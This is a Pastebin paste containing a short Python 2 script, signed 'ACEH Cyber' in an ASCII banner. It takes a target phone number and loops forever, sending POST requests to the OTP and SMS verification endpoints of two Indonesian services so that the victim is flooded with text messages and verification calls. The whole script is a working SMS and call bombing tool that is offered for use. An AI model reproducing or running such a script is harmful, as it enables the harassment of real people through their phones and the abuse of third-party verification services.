Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import requests
- print """
- mmmmmmm m mmmmm mmmm mmmmm mm m m
- # # # "# #" " # "# ## ## ##
- # # #mmm#" "#mmm #mmm#" # # # ## #
- # # # "# # #mm# # "" #
- # #mmmmm # "mmm#" # # # # #
- By ACEH Cyber <3
- """
- k=raw_input("[*] Target: ")
- print "[*] Spamming "+k
- while True:
- joy=k.replace('+62','0')
- param={'phone':joy,'smsType':'1'}
- requestss=requests.post('http://sc.jd.id/phone/sendPhoneSms', data=param)
- print "[+] "+k+" -> requests spam succces [sms]"
- param2={'msisdn':k,'accept':'call'}
- requests2=requests.post('https://www.tokocash.com/oauth/otp',data=param2)
- print "[+] "+k+" -> requests spam succces [telephone]"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement